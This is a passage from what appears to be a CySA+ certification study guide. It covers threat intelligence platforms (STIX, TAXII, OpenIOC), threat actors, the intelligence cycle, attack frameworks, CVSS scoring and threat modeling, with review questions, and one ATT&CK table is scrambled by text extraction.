Managing the collection and analysis of these indicators can be
a major headache. Indicator management systems have
been developed to make this process somewhat easier. These
systems also provide insight into indicators present in other
networks that may not yet be present in your enterprise,
providing somewhat of an early-warning system. Let’s look at
some examples of these platforms.
Structured Threat Information eXpression (STIX)
Structured Threat Information eXpression (STIX) is an
XML-based programming language that can be used to
communicate cybersecurity data among those using the
language. It provides a common language for this
communication.
STIX was created with several core purposes in mind:
To identify patterns that could indicate cyber threats
To help facilitate cyber threat response activities, including
prevention, detection, and response
The sharing of cyber threat information within an organization and
with outside partners or communities that benefit from the
information
While STIX was originally sponsored by the Office of
Cybersecurity and Communications (CS&C) within the U.S.
Department of Homeland Security (DHS), it is now under the
management of the Organization for the Advancement of
Structured Information Standards (OASIS), a nonprofit
consortium that seeks to advance the development,
convergence, and adoption of open standards for the Internet.
Trusted Automated eXchange of Indicator Information
(TAXII)
Trusted Automated eXchange of Indicator
Information (TAXII) is an application protocol for
exchanging cyber threat information (CTI) over HTTPS. It
defines two primary services, Collections and Channels. Figure
1-1 shows the Collection service. A Collection is an interface to a
logical repository of CTI objects provided by a TAXII Server that
allows a producer to host a set of CTI data that can be requested
by consumers: TAXII Clients and Servers exchange information
in a request-response model.
Figure 1-1 Collection Service
Figure 1-2 shows a Channel service. Maintained by a TAXII
Server, a Channel allows producers to push data to many
consumers and allows consumers to receive data from many
producers: TAXII Clients exchange information with other
TAXII Clients in a publish-subscribe model.
FIGURE 1-2 Channel Service
These TAXII services can support a variety of common sharing
models:
Hub and spoke: One central clearinghouse
Source/subscriber: One organization is the single source of
information
Peer-to-peer: Multiple organizations share their information
OpenIOC
OpenIOC (Open Indicators of Compromise) is an open
framework designed for sharing threat intelligence information
in a machine-readable format. It is a simple framework that is
written in XML, which can be used to document and classify
forensic artifacts. It comes with a base set of 500 predefined
indicators, as provided by Mandiant (a U.S. cybersecurity firm
later acquired by FireEye).
THREAT CLASSIFICATION
After threat data has been collected though a vulnerability scan
or through an alert, it must be correlated to an attack type and
classified as to its severity and scope, based on how widespread
the incident appears to be and the types of data that have been
put at risk. This helps in the prioritization process. Much as in
the triage process in a hospital, incidents are not handled in the
order in which they are received or detected; rather, the most
dangerous issues are addressed first, and prioritization occurs
constantly.
When determining vulnerabilities and threats to an asset,
considering the threat actors first is often easiest. Threat actors
can be grouped into the following six categories:
Human: Includes both malicious and nonmalicious insiders and
outsiders, terrorists, spies, and terminated personnel
Natural: Includes floods, fires, tornadoes, hurricanes,
earthquakes, and other natural disasters or weather events
Technical: Includes hardware and software failure, malicious
code, and new technologies
Physical: Includes CCTV issues, perimeter measures failure, and
biometric failure
Environmental: Includes power and other utility failure, traffic
issues, biological warfare, and hazardous material issues (such as
spillage)
Operational: Includes any process or procedure that can affect
confidentiality, integrity, and availability (CIA)
When the vulnerabilities and threats have been identified, the
loss potential for each must be determined. This loss potential is
determined by using the likelihood of the event combined with
the impact that such an event would cause. An event with a high
likelihood and a high impact would be given more importance
than an event with a low likelihood and a low impact. Different
types of risk analysis should be used to ensure that the data that
is obtained is maximized. Once an incident has been placed into
one of these classifications, options that are available for that
classification are considered. The following sections look at
three common classifications that are used.
Known Threat vs. Unknown Threat
In the cybersecurity field, known threats are threats that are
common knowledge and easily identified through signatures by
antivirus and intrusion detection system (IDS) engines or
through domain reputation blacklists. Unknown threats, on
the other hand, are lurking threats that may have been
identified but for which no signatures are available. We are not
completely powerless against these threats. Many security
products attempt to locate these threats through static and
dynamic file analysis. This may occur in a sandboxed
environment, which protects the system that is performing the
analysis. In some cases, unknown threats are really old threats
that have been recycled. Because security products have limited
memory with regard to threat signatures, vendors must choose
the most current attack signatures to include. Therefore, old
attack signatures may be missing in newer products, which
effectively allows old known threats to reenter the unknown
category.
Zero-day
In many cases, vulnerabilities discovered in live environments
have no current fix or patch. Such a vulnerability is referred to
as zero-day vulnerability. The best way to prevent zero-day
attacks is to write bug-free applications by implementing
efficient designing, coding, and testing practices. Having staff
discover zero-day vulnerabilities is much better than having
those looking to exploit the vulnerabilities find them.
Monitoring known hacking community websites can often help
you detect attacks early because hackers often share zero-day
exploit information.
Honeypots or honeynets can also provide forensic information
about hacker methods and tools for zero-day attacks. New zeroday attacks against a broad range of technology systems are
announced on a regular basis. A security manager should create
an inventory of applications and maintain a list of critical
systems to manage the risks of these attack vectors.
Because zero-day attacks occur before a fix or patch has been
released, preventing them is difficult. As with many other
attacks, keeping all software and firmware up to date with the
latest updates and patches is important. Enabling audit logging
of network traffic can help reconstruct the path of a zero-day
attack. Security professionals can inspect logs to determine the
presence of an attack in the network, estimate the damage, and
identify corrective actions. Zero-day attacks usually involve
activity that is outside “normal” activity, so documenting
normal activity baselines is important. Also, routing traffic
through a central internal security service can ensure that any
fixes affect all the traffic in the most effective manner.
Whitelisting can also aid in mitigating attacks by ensuring that
only approved entities are able to use certain applications or
complete certain tasks. Finally, security professionals should
ensure that the organization implements the appropriate
backup schemes to ensure that recovery can be achieved,
thereby providing remediation from the attack.
Advanced Persistent Threat
An advanced persistent threat (APT) is a hacking process
that targets a specific entity and is carried out over a long period
of time. In most cases, the victim of an APT is a large
corporation or government entity. The attacker is usually an
organized, well-funded group of highly skilled individuals,
sometimes sponsored by a nation-state. The attackers have a
predefined objective. Once the objective is met, the attack is
halted. APTs can often be detected by monitoring logs and
performance metrics. While no defensive actions are 100%
effective, the following actions may help mitigate many APTs:
Use application whitelisting to help prevent malicious software and
unapproved programs from running.
Patch applications such as Java, PDF viewers, Flash, web browsers,
and Microsoft Office products.
Patch operating system vulnerabilities.
Restrict administrative privileges to operating systems and
applications, based on user duties.
THREAT ACTORS
A threat is carried out by a threat actor. For example, an
attacker who takes advantage of an inappropriate or absent
access control list (ACL) is a threat actor. Keep in mind, though,
that threat actors can discover and/or exploit vulnerabilities.
Not all threat actors will actually exploit an identified
vulnerability.
The Federal Bureau of Investigation (FBI) has identified three
categories of threat actors: nations-state or state sponsors,
organized crime, and terrorist groups.
Nation-state
Nation-state or state sponsors are usually foreign governments.
They are interested in pilfering data, including intellectual
property and research and development data, from major
manufacturers, tech companies, government agencies, and
defense contractors. They have the most resources and are the
best organized of any of the threat actor groups.
Organized Crime
Organized crime groups primarily threaten the financial
services sector and are expanding the scope of their attacks.
They are well financed and organized.
Terrorist Groups
Terrorist groups want to impact countries by using the Internet
and other networks to disrupt or harm the viability of a society
by damaging its critical infrastructure.
Hacktivist
While not mentioned by the FBI, hacktivists are activists for a
cause, such as animal rights, that use hacking as a means to get
their message out and affect the businesses that they feel are
detrimental to their cause.
Insider Threat
Insider threats should be one of the biggest concerns for
security personnel. Insiders have knowledge of and access to
systems that outsiders do not have, giving insiders a much
easier avenue for carrying out or participating in an attack. An
organization should implement the appropriate event collection
and log review policies to provide the means to detect insider
threats as they occur. These threats fall into two categories,
intentional and unintentional.
Intentional
Intentional insider threats are insiders who have ill intent.
These folks typically either are disgruntled over some perceived
slight or are working for another organization to perform
corporate espionage. They may share sensitive documents with
others or they may impart knowledge used to breach a network.
This is one of the reasons that users’ permissions and rights
must not exceed those necessary to perform their jobs. This
helps to limit the damage an insider might inflict.
Unintentional
Sometimes internal users unknowingly increase the likelihood
that security breaches will occur. Such unintentional insider
threats do not have malicious intent; they simply do not
understand how system changes can affect security.
Security awareness and training should include coverage of
examples of misconfigurations that can result in security
breaches occurring and/or not being detected. For example, a
user may temporarily disable antivirus software to perform an
administrative task. If the user fails to reenable the antivirus
software, he unknowingly leaves the system open to viruses. In
such a case, an organization should consider implementing
group policies or some other mechanism to periodically ensure
that antivirus software is enabled and running. Another
solution could be to configure antivirus software to
automatically restart after a certain amount of time.
Recording and reviewing user actions via system, audit, and
security logs can help security professionals identify
misconfigurations so that the appropriate policies and controls
can be implemented.
INTELLIGENCE CYCLE
Intelligence activities of any sort, including cyber intelligence
functions, should follow a logical process developed over years
by those in the business. The intelligence cycle model specified
in exam objective 1.1 contains five stages:
1. Requirements: Before beginning intelligence activities, security
professionals must identify what the immediate issue is and define
as closely as possible the requirements of the information that
needs to be collected and analyzed. This means the types of data to
be sought are driven by the types of issues with which we are
concerned. The amount of potential information may be so vast
that unless we filter it to what is relevant, we may be unable to fully
understand what is occurring in the environment.
2. Collection: This is the stage in which most of the hard work
occurs. It is also the stage at which recent advances in artificial
intelligence (AI) and automation have changed the game. Collection
is time-consuming work that involves web searches, interviews,
identifying sources, and monitoring, to name a few activities. New
tools automate data searching, organizing, and presenting
information in easy-to-view dashboards.
3. Analysis: In this stage, data is combed and analyzed to identify
pieces of information that have the following characteristics:
1. Timely: Can be tied to the issue from a time standpoint
2. Actionable: Suggests or leads to a proper mitigation
3. Consistent: Reduces uncertainty surrounding an issue
This is the stage in which the skills of the security professional have
the most impact, because the ability to correlate data with issues
requires keen understanding of vulnerabilities, their symptoms,
and solutions.
4. Dissemination: Hopefully analysis leads to a solution or set of
solutions designed to prevent issues. These solutions, be they
policies, scripts, or configuration changes, must be communicated
to the proper personnel for deployment. The security professional
acts as the designer and the network team acts as the builder of the
solution. In the case of policy changes, the human resources (HR)
team acts as the builder.
5. Feedback: Gathering feedback on the intelligence cycle before the
next cycle begins is important so that improvements can be defined.
What went right? What worked? What didn’t? Was the analysis
stage performed correctly? Was the dissemination process clear
and timely? Improvements can almost always be identified.
COMMODITY MALWARE
Commodity malware is malware that is widely available
either for purchase or by free download. It is not customized or
tailored to a specific attack. It does not require complete
understanding of its processes and is used by a wide range of
threat actors with a range of skill levels. Although no clear
dividing line exists between commodity malware and what is
called advanced malware (and in fact the lines are blurring
more all the time), generally we can make a distinction based on
the skill level and motives of the threat actors who use the
malware. Less-skilled threat actors (script kiddies, etc.) utilize
these prepackaged commodity tools, whereas more-skilled
threat actors (APTs, etc.) typically customize their attack tools
to make them more effective in a specific environment. The
motives of those who employ commodity malware tend to be
gaining experience in hacking and experimentation.
INFORMATION SHARING AND ANALYSIS
COMMUNITIES
Over time, security professionals have developed methods and
platforms for sharing the cybersecurity information they have
developed. Some information sharing and analysis communities
focus on specific industries while others simply focus on critical
issues common to all:
Healthcare: In the healthcare community, where protection of
patient data is legally required by the Health Insurance Portability
and Accountability Act (HIPAA), an example of a sharing platform
is the Health Information Sharing and Analysis Center (H-ISAC). It
is a global operation focused on sharing timely, actionable, and
relevant information among its members, including intelligence on
threats, incidents, and vulnerabilities. This sharing of information
can be done on a human-to-human or machine-to-machine basis.
Financial: The financial services sector is under pressure to
protect financial records with laws such as the Financial Services
Modernization Act of 1999, commonly known as the Gramm-LeachBliley Act (GLBA). The Financial Services Information Sharing and
Analysis Center (FS-ISAC) is an industry consortium dedicated to
reducing cyber risk in the global financial system. It shares among
its members and trusted sources critical cyber intelligence, and
builds awareness through summits, meetings, webinars, and
communities of interest.
Aviation: In the area of aviation, the U.S. Department of
Homeland Security’s Cybersecurity and Infrastructure Security
Agency (CISA) maintains a number of chartered organizations,
among them the Aviation Government Coordinating Council
(AGCC). Its charter document reads “The AGCC coordinates
strategies, activities, policy and communications across government
entities within the Aviation Sub-Sector. The AGCC acts as the
government counterpart to the private industry-led ‘Aviation Sector
Coordinating Council’ (ASCC).” The Aviation Sector Coordinating
Council is an example of a private sector counterpart.
Government: For government agencies, the aforementioned CISA
also shares information with state, local, tribal, and territorial
governments and with international partners, as cybersecurity
threat actors are not constrained by geographic boundaries. As
CISA describes itself on the Department of Homeland Security
website, “CISA is the Nation’s risk advisor, working with partners to
defend against today’s threats and collaborating to build more
secure and resilient infrastructure for the future.”
Critical infrastructure: All of the previously mentioned
platforms and organizations are dedicated to helping organizations
protect their critical infrastructure. As an example of international
cooperation, the European Union Agency for Network and
Information Security (ENISA) is a center of network and
information security expertise for the European Union (EU). ENISA
describes itself as follows: “ENISA works with these groups to
develop advice and recommendations on good practice in
information security. It assists member states in implementing
relevant EU legislation and works to improve the resilience of
Europe’s critical information infrastructure and networks. ENISA
seeks to enhance existing expertise in member states by supporting
the development of cross-border communities committed to
improving network and information security throughout the EU.”
More information about ENISA and its work can be found at
https://www.enisa.europa.eu.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 1-2
lists a reference of these key topics and the page number on
which each is found.
Table 1-2 Key Topics in Chapter 1
Key Topic
Element
Description
Page
Number
Section
Open-source intelligence
6
Section
Closed-source intelligence
6
Section
Indicator management
platforms
7
Section
Threat actors
12
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
open-source intelligence
proprietary/closed-source intelligence
timeliness
relevancy
confidence levels
accuracy
indicator management
Structured Threat Information eXpression (STIX)
Trusted Automated eXchange of Indicator Information
(TAXII)
OpenIOC
known threats
unknown threats
zero-day threats
advanced persistent threat
collection
analysis
dissemination
commodity malware
REVIEW QUESTIONS
1. Give at least two examples of open-source intelligence data.
2. ________________ is an open framework that is
designed for sharing threat intelligence information in a
machine-readable format.
3. Match the following items with the correct definition.
Items
Definitions
OpenIOC
An XML-based programming language that can be
used to communicate cybersecurity data among
those using the language.
STIX
Uses its proprietary artificial intelligence and
machine learning algorithms to help organizations
to unravel cyber risks and threats and enables
proactive cyber posture management.
Cyber
Intelligenc
e Analytics
Platform
(CAP)
v2.0
An open framework that is designed for sharing
threat intelligence information in a machinereadable format.
4. Which threat actor has already performed network
penetration?
5. List the common sharing models used in TAXII.
6. ________________ are hacking for a cause, such as for
animal rights, and use hacking as a means to get their
message out and affect the businesses that they feel are
detrimental to their cause.
7. Match the following items with their definition.
Items
Definitions
Zeroday
Threat carried out over a long period of time
APT
Threat with no known solution
Terrori
st
Hacks not for monetary gain but simply to destroy or
deface
8. APT attacks are typically sourced from which group of
threat actors?
9. What intelligence gathering step is necessary because the
amount of potential information may be so vast?
10. The Aviation Government Coordinating Council is
chartered by which organization?
Chapter 2
Utilizing Threat
Intelligence to Support
Organizational Security
This chapter covers the following topics related to Objective 1.2
(Given a scenario, utilize threat intelligence to support
organizational security) of the CompTIA Cybersecurity Analyst
(CySA+) CS0-002 certification exam:
Attack frameworks: Introduces the MITRE ATT&CK framework,
the Diamond Model of Intrusion Analysis, and the kill chain.
Threat research: Covers reputational and behavioral research,
indicators of compromise (IoC), and the Common Vulnerability
Scoring System (CVSS).
Threat modeling methodologies: Discusses the concepts of
adversary capability, total attack surface, attack vector, impact, and
likelihood.
Threat intelligence sharing with supported functions:
Describes intelligence sharing with the functions incident response,
vulnerability management, risk management, security engineering,
and detection and monitoring.
Threat intelligence comprises information gathered that does
one of the following things:
Educates and warns you about potential dangers not yet seen in the
environment
Identifies behavior that accompanies malicious activity
Alerts you of ongoing malicious activity
However, possessing threat intelligence is of no use if it is not
converted into concrete activity that responds to and mitigates
issues. This chapter discusses how to utilize threat intelligence
to support organizational security.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these four self-assessment questions, you might
want to skip ahead to the “Exam Preparation Tasks” section.
Table 2-1 lists the major headings in this chapter and the “Do I
Know This Already?” quiz questions covering the material in
those headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This Already?”
quiz appear in Appendix A.
Table 2-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section
Questio
n
Attack Frameworks
1
Threat Research
2
Threat Modeling Methodologies
3
Threat Intelligence Sharing with Supported
Functions
4
1. Which of the following is a knowledge base of adversary
tactics and techniques based on real-world observations?
1. Diamond Model
2. OWASP
3. MITRE ATT&CK
4. STIX
2. Which of the following threat intelligence data types is
generated from past activities?
1. Reputational
2. Behavioral
3. Heuristics
4. Anticipatory
3. Your team has identified that a recent breach was sourced
by a disgruntled employee. What part of threat modeling is
being performed by such identification?
1. Total attack surface
2. Impact
3. Adversary capability
4. Attack vector
4. Which of the following functions uses shared threat
intelligence data to build in security for new products and
solutions?
1. Incident response
2. Security engineering
3. Vulnerability management
4. Risk management
FOUNDATION TOPICS
ATTACK FRAMEWORKS
Many organizations have developed security management
frameworks and methodologies to help guide security
professionals. These attack frameworks and methodologies
include security program development standards, enterprise
and security architecture development frameworks, security
control development methods, corporate governance methods,
and process management methods. The following sections
discuss major frameworks and methodologies and explain
where they are used.
MITRE ATT&CK
MITRE ATT&CK is a knowledge base of adversary tactics and
techniques based on real-world observations. It is an open
system, and attack matrices based on it have been created for
various industries. It is designed as a foundation for the
development of specific threat models and methodologies in the
private sector, in government, and in the cybersecurity product
and service community.
An example of such a matrix is the SaaS Matrix created for
organizations utilizing Software as a Service (SaaS), shown in
Table 2-2. The corresponding matrix on the MITRE ATT&CK
website is interactive
(https://attack.mitre.org/matrices/enterprise/cloud/saas/),
and when you click the name of an attack technique in a cell, a
new page opens with a detailed explanation of that attack
technique. For more information about the MITRE ATT&CK
Matrix for Enterprise and to view the matrices it provides for
other platforms (Windows, macOS, etc.), see
https://attack.mitre.org/matrices/enterprise/.
Table 2-2 ATT&CK Matrix for SaaS
Initi
al
Per
sist
Pri
vile
Defe
nse
Crede
ntial
Disc
over
Later
al
Collecti
on
acce
ss
enc
e
ge
Esc
alat
ion
Evasi
on
Access
D
ri
ve
b
y
C
o
m
pr
o
m
is
e
R
e
d
u
n
d
a
n
t
A
c
c
e
s
s
V
a
li
d
A
c
c
o
u
n
t
s
Ap
pli
cat
ion
Ac
ces
s
To
ke
n
Brut
e
Forc
e
S
p
ea
r
P
hi
sh
in
g
Li
n
k
V
a
l
i
d
Re
du
nd
ant
Ac
ces
s
Stea
l
App
licat
ion
Acce
ss
Tok
en
Int
er
nal
Sp
ear
Ph
ish
ing
Va
lid
Ac
co
un
ts
Stea
l
Web
Sess
ion
W
eb
Se
ssi
on
Co
T
ru
st
e
d
R
A
c
c
o
u
n
t
s
y
Mov
eme
nt
Cl
ou
d
Se
rvi
ce
Di
sc
ov
er
y
Ap
pli
cat
ion
Ac
ces
s
To
ke
n
Data
from
Infor
matio
n
Repos
itories
el
at
io
n
sh
ip
V
al
id
A
cc
o
u
nt
s
Coo
kie
oki
e
W
eb
Se
ssi
on
Co
oki
e
The Diamond Model of Intrusion Analysis
The Diamond Model of Intrusion Analysis emphasizes
the relationships and characteristics of four basic components:
the adversary, capabilities, infrastructure, and victims. The
main axiom of this model states, “For every intrusion event
there exists an adversary taking a step towards an intended goal
by using a capability over infrastructure against a victim to
produce a result.”
Figure 2-1 shows a depiction of the Diamond Model.
Figure 2-1 Diamond Model
The corners of the Diamond Model are defined as follows:
Adversary: The intent of the attack
Capability: Attacker intrusion tools and techniques
Infrastructure: The set of systems an attacker uses to launch
attacks
Victim: A single victim or multiple victims
To access the Diamond Model document see
https://www.activeresponse.org/wpcontent/uploads/2013/07/diamond.pdf.
Kill Chain
The cyber kill chain is a cyber intrusion identification and
prevention model developed by Lockheed Martin that describes
the stages of an intrusion. It includes seven steps, as described
in Figure 2-2. For more information, see
https://www.lockheedmartin.com/enus/capabilities/cyber/cyber-kill-chain.html.
Figure 2-2 Kill Chain
THREAT RESEARCH
As a security professional, sometimes just keeping up with your
day-to-day workload can be exhausting. But performing
ongoing research as part of your regular duties is more
important in today’s world than ever before. You should work
with your organization and direct supervisor to ensure that you
either obtain formal security training on a regular basis or are
given adequate time to maintain and increase your security
knowledge. You should research the current best security
practices, any new security technologies that are coming to
market, any new security systems and services that have
launched, and how security technology has evolved recently.
Threat intelligence is a process that is used to inform decisions
regarding responses to any menace or hazard presented by the
latest attack vectors and actors emerging on the security
horizon. Threat intelligence analyzes evidence-based
knowledge, including context, mechanisms, indicators,
implications, and actionable advice, about an existing or
emerging menace or hazard to assets.
Performing threat intelligence requires generating a certain
amount of raw material for the process. This information
includes data on the latest attacks, knowledge of current
vulnerabilities and threats, specifications on the latest zero-day
mitigation controls and remediation techniques, and
descriptions of the latest threat models. Let’s look at some
issues important to threat research.
Reputational
Some threat intelligence data is generated from past activities.
Reputational scores may be generated for traffic sourced from
certain IP ranges, domain names, and URLs. An example of a
system that uses such reputational scores is the Cisco Talos IP
and Domain Reputation Center. Customers who are
participants in the system enjoy the access to data from all
customers.
As malicious traffic is received by customers, reputational
scores are developed for IP ranges, domain names, and URLs
that serve as sources of the traffic. Based on these scores, traffic
may be blocked from those sources on the customer networks.
Behavioral
Some threat intelligence data is based not on reputation but on
the behavior of the traffic in question. For example, when the
source in question is repeatedly sending large amounts of traffic
to a single IP address, it indicates a potential DoS attack.
Behavioral analysis is also known as anomaly analysis, because
it also observes network behaviors for anomalies. It can be
implemented using combinations of the scanning types,
including NetFlow, protocol, and packet analyses, to create a
baseline and subsequently report departures from the traffic
metrics found in the baseline. One of the newer advances in this
field is the development of user and entity behavior analytics
(UEBA). This type of analysis focuses on user activities.
Combining behavior analysis with machine learning, UEBA
enhances the ability to determine which particular users are
behaving oddly. An example would be a hacker who has stolen
credentials of a user and is identified by the system because he
is not performing the same activities that the user would
perform.
Heuristics is a method used in malware detection, behavioral
analysis, incident detection, and other scenarios in which
patterns must be detected in the midst of what might appear to
be chaos. It is a process that ranks alternatives using search
algorithms, and although it is not an exact science and is
somewhat a form of “guessing,” it has been shown in many
cases to approximate an exact solution. Heuristics also includes
a process of self-learning through trial and error as it arrives at
the final approximated solution. Many IPS, IDS and antimalware systems that include heuristics capabilities can often
detect so-called zero-day issues using this technique.
Indicator of Compromise (IoC)
An indicator of compromise (IoC) is any activity, artifact,
or log entry that is typically associated with an attack of some
sort. Typical examples include the following:
Virus signatures
Known malicious file types
Domain names of known botnet servers
Known IoCs are exchanged within the security industry, using
the Traffic Light Protocol (TLP) to classify the IoCs. TLP is a set
of designations used to ensure that sensitive information is
shared with the appropriate audience. Somewhat analogous to a
traffic light, it employs four colors to indicate expected sharing
boundaries to be applied by the recipient.
Common Vulnerability Scoring System (CVSS)
The Common Vulnerability Scoring System (CVSS)
version 3.1 is a system of ranking vulnerabilities that are
discovered based on predefined metrics. This system ensures
that the most critical vulnerabilities can be easily identified and
addressed after a vulnerability test is met. Most commercial
vulnerability management tools use CVSS scores as a baseline.
Scores are awarded on a scale of 0 to 10, with the values having
the following ranks:
Note
The Forum of Incident Response and Security Teams (FIRST) is the custodian
of CVSS 3.1.
0: No issues
0.1 to 3.9: Low
4.0 to 6.9: Medium
7.0 to 8.9: High
9.0 to 10.0: Critical
CVSS is composed of three metric groups:
Base: Characteristics of a vulnerability that are constant over time
and user environments
Temporal: Characteristics of a vulnerability that change over time
but not among user environments
Environmental: Characteristics of a vulnerability that are
relevant and unique to a particular user’s environment
The Base metric group includes the following metrics:
Attack Vector (AV): Describes how the attacker would exploit
the vulnerability and has four possible values:
L: Stands for Local and means that the attacker must have
physical or logical access to the affected system
A: Stands for Adjacent network and means that the attacker
must be on the local network
N: Stands for Network and means that the attacker can cause the
vulnerability from any network
P: Stands for Physical and requires the attacker to physically
touch or manipulate the vulnerable component
Attack Complexity (AC): Describes the difficulty of exploiting
the vulnerability and has three possible values:
H: Stands for High and means that the vulnerability requires
special conditions that are hard to find
L: Stands for Low and means that the vulnerability does not
require special conditions
Privileges Required (Pr): Describes the authentication an
attacker would need to get through to exploit the vulnerability and
has three possible values:
H: Stands for High and means the attacker requires privileges
that provide significant (e.g., administrative) control over the
vulnerable component allowing access to component-wide
settings and files
L: Stands for Low and means the attacker requires privileges
that provide basic user capabilities that could normally affect
only settings and files owned by a user
N: Stands for None and means that no authentication
mechanisms are in place to stop the exploit of the vulnerability
User Interaction (UI): Captures the requirement for a human
user, other than the attacker, to participate in the successful
compromise of the vulnerable component.
N: Stands for None and means the vulnerable system can be
exploited without interaction from any user
R: Stands for Required and means successful exploitation of this
vulnerability requires a user to take some action before the
vulnerability can be exploited
Scope (S): Captures whether a vulnerability in one vulnerable
component impacts resources in components beyond its security
scope.
U: Stands for Unchanged and means the exploited vulnerability
can only affect resources managed by the same security authority
C: Stands for Changed and means that the exploited
vulnerability can affect resources beyond the security scope
managed by the security authority of the vulnerable component
The Impact metric group includes the following metrics:
Availability (A): Describes the disruption that might occur if the
vulnerability is exploited and has three possible values:
N: Stands for None and means that there is no availability
impact
L: Stands for Low and means that system performance is
degraded
H: Stands for High and means that the system is completely shut
down
Confidentiality (C): Describes the information disclosure that
may occur if the vulnerability is exploited and has three possible
values:
N: Stands for None and means that there is no confidentiality
impact
L: Stands for Low and means some access to information would
occur
H: Stands for High and means all information on the system
could be compromised
Integrity (I): Describes the type of data alteration that might
occur and has three possible values:
N: Stands for None and means that there is no integrity impact
L: Stands for Low and means some information modification
would occur
H: Stands for High and means all information on the system
could be compromised
The CVSS vector looks something like this:
CVSS2#AV:L/AC:H/Pr:L/UI:R/S:U/C:L/I:N/A:N
This vector is read as follows:
AV:L: Access vector, where L stands for Local and means that the
attacker must have physical or logical access to the affected system
AC:H: Attack complexity, where H stands for stands for High and
means that the vulnerability requires special conditions that are
hard to find
Pr:L: Privileges Required, where L stands for Low and means the
attacker requires privileges that provide basic user capabilities that
could normally affect only settings and files owned by a user
UI:R: User Interaction, where R stands for Required and means
successful exploitation of this vulnerability requires a user to take
some action before the vulnerability can be exploited
S:U: Scope, where U stands for Unchanged and means the
exploited vulnerability can only affect resources managed by the
same security authority
C:L: Confidentiality, where L stands for Low and means that some
access to information would occur
I:N: Integrity, where N stands for None and means that there is no
integrity impact
A:N: Availability, where N stands for None and means that there is
no availability impact
For more information, see https://www.first.org/cvss/v31/cvss-v31-specification_r1.pdf.
Note
For access to CVVS calculators, see the following resources:
CVSS Scoring System Calculator: https://nvd.nist.gov/vulnmetrics/cvss/v3-calculator?calculator&adv&version=2
CVSS Version 3.1 Calculator: https://www.first.org/cvss/calculator/3.1
THREAT MODELING METHODOLOGIES
An organization should have a well-defined risk
management process in place that includes the evaluation of
risk that is present. When this process is carried out properly, a
threat modeling methodology allows organizations to
identify threats and potential attacks and implement the
appropriate mitigations against these threats and attacks. These
facets ensure that security controls that are implemented are in
balance with the operations of the organization. There are a
number of factors to consider in a threat modeling methodology
that will be covered in the following section.
Adversary Capability
First, you must have a grasp of the capabilities of the attacker.
Threat actors have widely varying capabilities. When carrying
out threat modeling, you may decide to develop a more
comprehensive list of threat actors to help in scenario
development.
Security professionals should analyze all the threats to identify
all the actors who pose significant threats to the organization.
Examples of the threat actors include both internal and external
actors and include the following:
Internal actors:
Reckless employee
Untrained employee
Partner
Disgruntled employee
Internal spy
Government spy
Vendor
Thief
External actors:
Anarchist
Competitor
Corrupt government official
Data miner
Government cyber warrior
Irrational individual
Legal adversary
Mobster
Activist
Terrorist
Vandal
These actors can be subdivided into two categories: non-hostile
and hostile. In the preceding lists, three actors are usually
considered non-hostile: reckless employee, untrained employee,
and partner. All the other actors should be considered hostile.
The organization would then need to analyze each of these
threat actors according to set criteria. All threat actors should be
given a ranking to help determine which threat actors need to
be analyzed. Examples of some of the most commonly used
criteria include the following:
Skill level: None, minimal, operational, adept
Resources: Individual, team, organization, government
Limits: Code of conduct, legal, extra-legal (minor), extra-legal
(major)
Visibility: Overt, covert, clandestine, don’t care
Objective: Copy, destroy, injure, take, don’t care
Outcome: Acquisition/theft, business advantage, damage,
embarrassment, technical advantage
With these criteria, the organization must then determine which
of the actors it wants to analyze. For example, the organization
may choose to analyze all hostile actors that have a skill level of
adept, resources of an organization or government, and limits of
extra-legal (minor) or extra-legal (major). Then the list is
consolidated to include only the threat actors that fit all of these
criteria.
Total Attack Surface
The total attack surface comprises all the points at which
vulnerabilities exist. It is critical that the organization have a
clear understanding of the total attack surface. Otherwise, it is
somewhat like locking all the doors of which one is aware while
several doors exist of which one is not aware. The result is
unlocked doors.
Identifying the attack surface should be a formalized process
that arrives at a complete list of vulnerabilities. Only then can
each vulnerability be addressed properly with security controls,
processes, and procedures.
To identify the potential attacks that could occur, an
organization must create scenarios so that each potential attack
can be fully analyzed. For example, an organization may decide
to analyze a situation in which a hacktivist group performs
prolonged denial-of-service attacks, causing sustained outages
intended to damage the organization’s reputation. The
organization then must make a risk determination for each
scenario.
Once all the scenarios are determined, the organization
develops an attack tree for each potential attack. Such an attack
tree includes all the steps and/or conditions that must occur for
the attack to be successful. The organization then maps security
controls to the attack trees.
To determine the security controls that can be used, the
organization would need to look at industry standards,
including NIST SP 800-53 (revision 4 at the time of writing).
Finally, the organization would map controls back into the
attack tree to ensure that controls are implemented at as many
levels of the attack surface as possible.
Note
For more information on NIST SP 800-53, see
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf.
Attack Vector
An attack vector is the path or means with which the attack is
carried out. Some examples of attack vectors include the
following:
Phishing
Malware
Exploit unpatched vulnerabilities
Code injection
Social engineering
Advanced persistent threats (APTs)
Once attack vectors and attack agents have been identified, the
organization must assess the relative impact and likelihood of
such attacks. This allows the organization to prioritize the
limited resources available to address the vulnerabilities.
Impact
Once all assets have been identified and their value to the
organization has been established, the organization must
identify impact to each asset. An attempt must be made to
establish the impact to the organization should that occur.
While both quantitative and qualitative risk assessments may be
performed, when a qualitative assessment is conducted, the
risks are placed into the following categories:
High
Medium
Low
Typically a risk assessment matrix is created, such as the one
shown in Figure 2-3. Subject matter experts grade all risks on
their likelihood and their impact. This helps to prioritize the
application of resources to the most critical vulnerabilities.
Figure 2-3 Risk Assessment Matrix
Once the organization determines what it really cares about
protecting, the organization should then select the scenarios
that could have a catastrophic impact on the organization by
using the objective and outcome values from the adversary
capability analysis and the asset value and business impact
information from the impact analysis.
Probability
When performing the assessment mentioned in the previous
section, the organization must also consider the probability that
each security event occurs; note in Figure 2-3 that one axis of
the risk matrix is impact and the other is probability.
THREAT INTELLIGENCE SHARING WITH
SUPPORTED FUNCTIONS
Earlier we looked at the importance of sharing intelligence
information with other organizations. It is also critical that such
